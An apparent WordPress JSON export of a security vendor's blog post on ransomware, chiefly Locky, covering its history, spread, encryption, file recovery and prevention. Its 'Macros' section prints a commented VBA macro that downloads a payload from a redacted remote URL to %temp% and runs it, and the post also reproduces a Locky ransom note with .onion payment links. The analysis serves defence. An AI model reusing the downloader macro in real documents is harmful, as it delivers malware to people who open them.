{"id":428,"date":"2016-06-13T07:34:28","date_gmt":"2016-06-13T07:34:28","guid":{"rendered":"http:\/\/www.adlice.com\/fr\/?p=428"},"modified":"2022-12-21T10:36:56","modified_gmt":"2022-12-21T10:36:56","slug":"ransomware-propagation-prevention","status":"publish","type":"post","link":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/","title":{"rendered":"Ransomware: How Can You Protect Yourself Effectively?"},"content":{"rendered":"<div class=\"wp-block-ub-table-of-contents-block ub_table-of-contents\" id=\"ub_table-of-contents-11ac1492-2640-4a45-b494-68484ed9eb62\" data-linktodivider=\"false\" data-showtext=\"show\" data-hidetext=\"hide\" data-scrolltype=\"auto\" data-enablesmoothscroll=\"false\" data-initiallyhideonmobile=\"false\" data-initiallyshow=\"true\"><div class=\"ub_table-of-contents-header-container\" style=\"\">\n\t\t\t<div class=\"ub_table-of-contents-header\" style=\"text-align: left; \">\n\t\t\t\t<div class=\"ub_table-of-contents-title\"><\/div>\n\t\t\t\t\n\t\t\t<\/div>\n\t\t<\/div><div class=\"ub_table-of-contents-extra-container\" style=\"\">\n\t\t\t<div class=\"ub_table-of-contents-container ub_table-of-contents-1-column \">\n\t\t\t\t<ul style=\"\"><li style=\"\"><a href=\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#0-quest-ce-quun-ransomware-ou-ran%C3%A7ongiciel-\" style=\"\">What is ransomware (or ran\u00e7ongiciel)?<\/a><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#1-histoire-de-ransomware\" style=\"\">History of ransomware<\/a><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#2-m%C3%A9thode-de-propagation\" style=\"\">Propagation method<\/a><ul><li style=\"\"><a href=\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#3-macros-\" style=\"\">Macros<\/a><\/li><li style=\"\"><a 
href=\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#4-exploits-\" style=\"\">Exploits<\/a><\/li><\/ul><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#5-chiffrement-et-demande-de-ran%C3%A7on\" style=\"\">Encryption and ransom demand<\/a><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#6-d%C3%A9sinfection-r%C3%A9cup%C3%A9ration-des-fichiers-chiffr%C3%A9s\" style=\"\">Disinfection \/ recovery of encrypted files<\/a><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#7-pr%C3%A9vention\" style=\"\">Prevention<\/a><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#8-conclusion\" style=\"\">Conclusion<\/a><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#9-faq\" style=\"\">FAQ<\/a><\/li><\/ul>\n\t\t\t<\/div>\n\t\t<\/div><\/div>\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\" id=\"0-quest-ce-quun-ransomware-ou-ran%C3%A7ongiciel-\"><br>What is ransomware (or ran\u00e7ongiciel)?<\/h4>\n\n\n\n<p>Ransomware (ran\u00e7ongiciel) is a program that prevents the user from accessing their files and demands a ransom in exchange. \u201cClassic\u201d ransomware usually starts with the system and prevents the user from reaching the desktop. <strong>If the user does not pay<\/strong> within a certain time, <strong>the files are deleted<\/strong>. 
Crypto-ransomware, or cryptoware, encrypts the user\u2019s files and demands payment for a program that will let the user decrypt them.<\/p>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\" id=\"1-histoire-de-ransomware\"><br>History of ransomware<\/h4>\n\n\n\n<p>Ransomware, that is, software that demands a ransom, has existed for a very long time (<a href=\"https:\/\/en.wikipedia.org\/wiki\/AIDS_(Trojan_horse)\">AIDS Trojan, 1989<\/a>) but had very little impact. Its means of propagation were unsophisticated and its encryption routines ineffective. <strong>However, 2013 marked its return<\/strong> with the arrival on the market of the CryptoLocker malware. CryptoLocker stood out from its predecessors by using a robust encryption routine, and it used the <a href=\"https:\/\/fr.wikipedia.org\/wiki\/Zeus_(cheval_de_Troie)\">Zeus<\/a> botnet to spread. In the rest of this article, we focus specifically on current crypto-ransomware, and more precisely on Locky.<\/p>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\" id=\"2-m%C3%A9thode-de-propagation\"><br>Propagation method<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"3-macros-\"><br><strong>Macros<\/strong><\/h5>\n\n\n\n<p>Most of the time, the infection arrives as an attachment to an email. 
It is usually a <strong>Word or Excel document<\/strong> (.doc and .xls respectively).<\/p>\n\n\n\n<figure class=\"wp-block-image alignnone\"><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/locky-files-virus.png\"><img decoding=\"async\" width=\"846\" height=\"598\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/locky-files-virus.png\" alt=\"A spam mail containing an infected Word file. Source : pulsetheworld.com\" class=\"wp-image-426\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/locky-files-virus.png 846w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/locky-files-virus-300x212.png 300w\" sizes=\"(max-width: 846px) 100vw, 846px\" \/><\/a><figcaption class=\"wp-element-caption\">A spam email containing an infected Word attachment. Source: pulsetheworld.com<\/figcaption><\/figure>\n\n\n\n<p><strong>These documents contain a macro<\/strong>, which runs as soon as the document is opened. A commented example follows:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>' Location of the payload (hacked WordPress setup). 
Multiple URLs can be present\nurl = \"http:\/\/&#91;redacted]\/wp-includes\/certificates\/xh3uc\"\n\n' Name of the file to be created.\nfileName = \"temp.pif\"\n\n' Obtaining local computer %temp% path using the Environment collection (Shell object)\npathName = CreateObject(\"WScript.Shell\").ExpandEnvironmentStrings(\"%temp%\")\npathName = pathName &amp; '\\'\n\n' Creation of a XMLHttpRequest object (XML request using HTTP) used to download the payload\ndim webRequest: Set webRequest = createobject(\"Microsoft.XMLHTTP\")\n\n' Creation of a Stream Object (ADO) used to manipulate the stream\ndim stream: Set stream = createobject(\"Adodb.Stream\")\n\n' Synchronous connection established with remote server using GET HTTP method \nwebRequest.Open \"GET\", url, False\n\n' HTTP request to the server\nwebRequest.Send\nwith stream\n    .type = 1 ' Binary data\n    .open ' Creation and opening of a new Stream object\n    .write webRequest.responseBody ' Write the response body (in this case, the payload) in the new object\n    .savetofile pathName &amp;  fileName, 2 ' Save the binary contents of the stream to a file\n\t\t\t\t\t\t\t\t\t\t' Overwrites the file if it already exists\nend with\n\n' Creation of a new Application object and execution of the payload using its contexts.\nSet payload = CreateObject(\"Shell.Application\")\npayload.Open pathName &amp; fileName<\/code><\/pre>\n\n\n\n<p><strong>This macro runs when the document is opened<\/strong>. It downloads the crypto-ransomware itself (the payload) from a server operated by the attacker, then executes it. 
In some cases, the ransomware copies the document to the computer\u2019s shared folders.<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"4-exploits-\"><br><strong>Exploits<\/strong><\/h5>\n\n\n\n<p>Exploit kits use vulnerabilities present in browsers to force them to download and execute the crypto-ransomware. <strong>No user action is required<\/strong>.<br>It can also use <a href=\"https:\/\/fr.wikipedia.org\/wiki\/Ingenierie_sociale_(securite_de_l%27information)\">social engineering<\/a> to trick the user into installing the infection, for example by posing as a legitimate tool.<\/p>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\" id=\"5-chiffrement-et-demande-de-ran%C3%A7on\"><br>Encryption and ransom demand<\/h4>\n\n\n\n<p>Once the crypto-ransomware has been executed, it contacts the attacker\u2019s server in order to set up a unique pair of cryptographic keys. One of them, the public key, is used to encrypt the user\u2019s personal documents and is <strong>placed on the victim\u2019s computer<\/strong>. The other, the private key, is <strong>stored on the attacker\u2019s server<\/strong> and is what allows the files to be decrypted. This is <a href=\"https:\/\/fr.wikipedia.org\/wiki\/Cryptographie_asym%C3%A9trique\">asymmetric encryption<\/a>. <strong>The encrypted files are thus rendered completely unreadable.<\/strong><\/p>\n\n\n\n<p>Once this step is complete, the malware deletes the system restore points as well as the contents of the <a href=\"https:\/\/fr.wikipedia.org\/wiki\/Shadow_Copy\">Shadow Copy<\/a>, which could hold a copy of the files. 
It then creates a file telling the user that their files have been encrypted and containing a link to a <a href=\"https:\/\/www.adlice.com\/fr\/malware-crypto-mineur\/\" target=\"_blank\" rel=\"noreferrer noopener\">bitcoin<\/a> wallet where the ransom must be paid (usually between 0.5 and 1.5 bitcoins).<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>@@@@@@@ NOT YOUR LANGUAGE? USE https:\/\/translate.google.com\n\n@@@@@@@ What happened to your files ?\n@@@@@@@ All of your files were protected by a strong encryption with RZA4096\n@@@@@@@ More information about the en-Xryption keys using RZA4096 can be found here: http:\/\/en.wikipedia.org\/wiki\/RSA_(cryptosystem)\n\n@@@@@@@ How did this happen ?\n@@@@@@@ !!! Specially for your PC was generated personal RZA4096 Key , both publik and private.\n@@@@@@@ !!! ALL YOUR FILES were en-Xrypted with the publik key, which has been transferred to your computer via the Internet.\n@@@@@@@ !!! Decrypting of your files is only possible with the help of the privatt key and de-crypt program , which is on our Secret Server\n\n@@@@@@@ What do I do ?\n@@@@@@@ So , there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! 
, and restore your data easy way\n@@@@@@@ If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment\n\n\nYour personal ID: &#91;Redacted]\n\nFor more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:\n\n1 - http:\/\/gvxtkcbjnslm5vnt.onion.to\n2 - http:\/\/gvxtkcbjnslm5vnt.onion.cab\n3 - http:\/\/gvxtkcbjnslm5vnt.onion.city\n\nIf for some reasons the addresses are not available, follow these steps:\n\n1 - Download and install tor-browser: http:\/\/www.torproject.org\/projects\/torbrowser.html.en\n2 - After a successful installation, run the browser\n3 - Type in the address bar - http:\/\/gvxtkcbjnslm5vnt.onion\n4 - Follow the instructions on the site\n\nBe sure to copy your personal ID and the instruction link to your notepad not to lose them.<\/code><\/pre>\n\n\n\n<p><br>Bitcoin has greatly benefited ransomware because its authors can stay anonymous much more easily. Indeed, no identity document is needed to open an account. 
<strong>Here is a screenshot of the site gvxtkcbjnslm5vnt.onion<\/strong>, reachable only through the <a rel=\"noreferrer noopener\" href=\"https:\/\/www.adlice.com\/fr\/darknet-explique\/\" target=\"_blank\">Tor network<\/a>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png\"><img decoding=\"async\" width=\"754\" height=\"444\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png\" alt=\"2016-06-08_132612\" class=\"wp-image-425\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png 754w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612-300x177.png 300w\" sizes=\"(max-width: 754px) 100vw, 754px\" \/><\/a><\/figure>\n\n\n\n<p>If the user pays, they usually receive a program containing the private key, which lets them decrypt the files. If they wait too long, however, <strong>the private key is deleted from the server, making any decryption impossible<\/strong>.<\/p>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\" id=\"6-d%C3%A9sinfection-r%C3%A9cup%C3%A9ration-des-fichiers-chiffr%C3%A9s\"><br>Disinfection \/ recovery of encrypted files<\/h4>\n\n\n\n<p><strong>There is no universal solution. <\/strong><br>It is therefore advisable to submit one of the encrypted files to <a href=\"https:\/\/id-ransomware.malwarehunterteam.com\/\">ID Ransomware<\/a>, which will determine which variant of the malware is involved and, if one exists, suggest a tool to try to decrypt the files.<\/p>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\" id=\"7-pr%C3%A9vention\"><br>Prevention<\/h4>\n\n\n\n<p>Conventional antivirus products are not really effective against this kind of threat. 
Indeed, it often happens that by the time the infection is detected, most or even all of the data is already encrypted. There are, however, tools dedicated to this purpose, notably Malwares anti-ransomware and Bitdefender anti-ransomware. <\/p>\n\n\n\n<p>These tools use a behavioral approach to spot crypto-ransomware. More specifically, they watch running processes and <strong>if one of them modifies the headers of several files, it is stopped<\/strong>. Keep in mind, however, that they are not infallible and that <strong>variants specifically designed to counter them<\/strong> will certainly appear before long.<\/p>\n\n\n\n<p>Another approach, more restrictive but more effective, <strong>is to define protected locations in the file system where suspicious processes cannot write<\/strong>; these locations are thereby protected against any ransomware. 
This feature was added in <a href=\"https:\/\/www.adlice.com\/roguekiller\/\" target=\"_blank\" rel=\"noreferrer noopener\">RogueKiller V14<\/a>, in the form of the <a href=\"https:\/\/www.adlice.com\/fr\/docs\/roguekiller\/commencer\/parametres\/#doclock\">DocLock<\/a> protection module.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a class=\"dt-pswp-item\" href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/01\/DocLock_Alert.png\"><img decoding=\"async\" width=\"1024\" height=\"425\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2019\/10\/rk14_detection2-1024x425.png\" alt=\"\" class=\"wp-image-3565\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2019\/10\/rk14_detection2-1024x425.png 1024w, https:\/\/www.adlice.com\/wp-content\/uploads\/2019\/10\/rk14_detection2-300x125.png 300w, https:\/\/www.adlice.com\/wp-content\/uploads\/2019\/10\/rk14_detection2.png 1778w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>It is also good practice to <strong>keep your software up to date<\/strong> to guard against infections that use exploits, and <strong>not to allow macros to run automatically<\/strong>. Keeping a copy of your personal documents is also <strong>strongly recommended<\/strong>.<\/p>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\" id=\"8-conclusion\"><br>Conclusion<\/h4>\n\n\n\n<p>Ransomware is set to grow even further in the future. It is <strong>highly profitable and relatively simple to develop<\/strong>. Software solutions (see the section above) exist but are far from a panacea. 
The best solution therefore remains to <strong>back up your data regularly to external media<\/strong> so that you have a copy of it at all times. That copy can also help after a hard-disk crash, which can happen at any time and is very likely to leave the data completely <strong>unrecoverable<\/strong>.<\/p>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\" id=\"9-faq\"><br>FAQ<\/h4>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Should I pay?<\/strong><br>It is recommended not to give in to blackmail. Paying only encourages the authors, and sometimes the files cannot be decrypted even after payment. However, if the data is truly valuable to you and every recovery attempt has failed, it is an option.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>I do not intend to pay. Can I delete the encrypted files?<\/strong><br>It is advisable to keep the encrypted data, because a decryption tool may appear at some point in the more or less distant future.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Why not develop a decryption tool for every existing variant?<\/strong><br>The decryption tools released by antivirus vendors are made possible by the discovery of flaws in certain encryption mechanisms, or by obtaining the private keys after a server is seized.<br>However, this applies to only a small number of crypto-ransomware.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>I have time and a powerful computer. 
Can\u2019t I try to find the decryption key with a brute-force attack?<\/strong><br>Recent crypto-ransomware usually uses 2048-bit RSA keys or larger. Experts agree that these are impossible to crack.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Why not seize the servers \/ bitcoin accounts used by the attackers?<\/strong><br>Law enforcement is working on this, but it is a long and complicated process. In addition, attackers often use compromised machines. However, <a href=\"https:\/\/en.wikipedia.org\/wiki\/Operation_Tovar\">Operation Tovar<\/a> showed that it is possible, by putting an end to the CryptoLocker infection and recovering the database containing the private keys.<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Ransomware has become the threat of the web. 
Learn how it works, what its effects are, and how to protect yourself against it.<\/p>\n","protected":false},"author":1,"featured_media":425,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[54],"tags":[20,126,135,370,377,23,8,136,138],"class_list":["post-428","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-analyse","tag-analyse","tag-cryptolocker","tag-cryptolocker-fr","tag-locky","tag-locky-fr","tag-malware-fr","tag-malware","tag-rancon","tag-rancongiciel","category-54","description-off"],"views":883,"yoast_score":61,"yoast_readable":90,"featured_image_src":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png","author_info":{"display_name":"tigzy","author_link":"https:\/\/www.adlice.com\/fr\/author\/tigzy\/"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.1.1 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Ransomware : Comment s&#039;en prot\u00e9ger ? | D\u00e9finition \u2022 Adlice Software<\/title>\n<meta name=\"description\" content=\"Les Ransomware connaissent un pic d&#039;activit\u00e9, et touchent particuliers et entreprises. Apprenez \u00e0 vous en prot\u00e9ger \u00e0 travers cette analyse.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Ransomware : Comment s&#039;en prot\u00e9ger ? | D\u00e9finition \u2022 Adlice Software\" \/>\n<meta property=\"og:description\" content=\"Les Ransomware connaissent un pic d&#039;activit\u00e9, et touchent particuliers et entreprises. 
Apprenez \u00e0 vous en prot\u00e9ger \u00e0 travers cette analyse.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/\" \/>\n<meta property=\"og:site_name\" content=\"Adlice Software\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/RogueKiller\" \/>\n<meta property=\"article:published_time\" content=\"2016-06-13T07:34:28+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-12-21T10:36:56+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png\" \/>\n\t<meta property=\"og:image:width\" content=\"754\" \/>\n\t<meta property=\"og:image:height\" content=\"444\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"tigzy\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@AdliceSoftware\" \/>\n<meta name=\"twitter:site\" content=\"@AdliceSoftware\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"tigzy\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/\"},\"author\":{\"name\":\"tigzy\",\"@id\":\"https:\/\/www.adlice.com\/fr\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d\"},\"headline\":\"Ransomware : Comment s&#8217;en prot\u00e9ger efficacement 
?\",\"datePublished\":\"2016-06-13T07:34:28+00:00\",\"dateModified\":\"2022-12-21T10:36:56+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/\"},\"wordCount\":1343,\"publisher\":{\"@id\":\"https:\/\/www.adlice.com\/fr\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png\",\"keywords\":[\"analyse\",\"cryptolocker\",\"cryptolocker\",\"locky\",\"locky\",\"malware\",\"malware\",\"ran\u00e7on\",\"ran\u00e7ongiciel\"],\"articleSection\":[\"Analyse\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/\",\"url\":\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/\",\"name\":\"Ransomware : Comment s'en prot\u00e9ger ? | D\u00e9finition \u2022 Adlice Software\",\"isPartOf\":{\"@id\":\"https:\/\/www.adlice.com\/fr\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png\",\"datePublished\":\"2016-06-13T07:34:28+00:00\",\"dateModified\":\"2022-12-21T10:36:56+00:00\",\"description\":\"Les Ransomware connaissent un pic d'activit\u00e9, et touchent particuliers et entreprises. 
Apprenez \u00e0 vous en prot\u00e9ger \u00e0 travers cette analyse.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#primaryimage\",\"url\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png\",\"contentUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png\",\"width\":754,\"height\":444},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.adlice.com\/fr\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Ransomware : Comment s&#8217;en prot\u00e9ger efficacement ?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.adlice.com\/fr\/#website\",\"url\":\"https:\/\/www.adlice.com\/fr\/\",\"name\":\"Adlice Software\",\"description\":\"Anti-malware and analysis tools\",\"publisher\":{\"@id\":\"https:\/\/www.adlice.com\/fr\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.adlice.com\/fr\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.adlice.com\/fr\/#organization\",\"name\":\"Adlice 
Software\",\"url\":\"https:\/\/www.adlice.com\/fr\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/www.adlice.com\/fr\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png\",\"contentUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png\",\"width\":276,\"height\":276,\"caption\":\"Adlice Software\"},\"image\":{\"@id\":\"https:\/\/www.adlice.com\/fr\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/RogueKiller\",\"https:\/\/x.com\/AdliceSoftware\",\"https:\/\/fr.linkedin.com\/company\/adlice-software\",\"https:\/\/www.youtube.com\/channel\/UC4CQ-gIZMGWxl-auf0QqYhQ\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.adlice.com\/fr\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d\",\"name\":\"tigzy\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/www.adlice.com\/fr\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g\",\"caption\":\"tigzy\"},\"description\":\"Founder and owner of Adlice Software, Tigzy started as lead developer on the popular Anti-malware called RogueKiller. Involved in all the Adlice projects as lead developer, Tigzy is also doing research and reverse engineering as well as writing blog posts.\",\"url\":\"https:\/\/www.adlice.com\/fr\/author\/tigzy\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Ransomware : Comment s'en prot\u00e9ger ? | D\u00e9finition \u2022 Adlice Software","description":"Les Ransomware connaissent un pic d'activit\u00e9, et touchent particuliers et entreprises. 
Apprenez \u00e0 vous en prot\u00e9ger \u00e0 travers cette analyse.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/","og_locale":"fr_FR","og_type":"article","og_title":"Ransomware : Comment s'en prot\u00e9ger ? | D\u00e9finition \u2022 Adlice Software","og_description":"Les Ransomware connaissent un pic d'activit\u00e9, et touchent particuliers et entreprises. Apprenez \u00e0 vous en prot\u00e9ger \u00e0 travers cette analyse.","og_url":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/","og_site_name":"Adlice Software","article_publisher":"https:\/\/www.facebook.com\/RogueKiller","article_published_time":"2016-06-13T07:34:28+00:00","article_modified_time":"2022-12-21T10:36:56+00:00","og_image":[{"width":754,"height":444,"url":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png","type":"image\/png"}],"author":"tigzy","twitter_card":"summary_large_image","twitter_creator":"@AdliceSoftware","twitter_site":"@AdliceSoftware","twitter_misc":{"\u00c9crit par":"tigzy","Dur\u00e9e de lecture estim\u00e9e":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#article","isPartOf":{"@id":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/"},"author":{"name":"tigzy","@id":"https:\/\/www.adlice.com\/fr\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d"},"headline":"Ransomware : Comment s&#8217;en prot\u00e9ger efficacement 
?","datePublished":"2016-06-13T07:34:28+00:00","dateModified":"2022-12-21T10:36:56+00:00","mainEntityOfPage":{"@id":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/"},"wordCount":1343,"publisher":{"@id":"https:\/\/www.adlice.com\/fr\/#organization"},"image":{"@id":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#primaryimage"},"thumbnailUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png","keywords":["analyse","cryptolocker","cryptolocker","locky","locky","malware","malware","ran\u00e7on","ran\u00e7ongiciel"],"articleSection":["Analyse"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/","url":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/","name":"Ransomware : Comment s'en prot\u00e9ger ? | D\u00e9finition \u2022 Adlice Software","isPartOf":{"@id":"https:\/\/www.adlice.com\/fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#primaryimage"},"image":{"@id":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#primaryimage"},"thumbnailUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png","datePublished":"2016-06-13T07:34:28+00:00","dateModified":"2022-12-21T10:36:56+00:00","description":"Les Ransomware connaissent un pic d'activit\u00e9, et touchent particuliers et entreprises. 
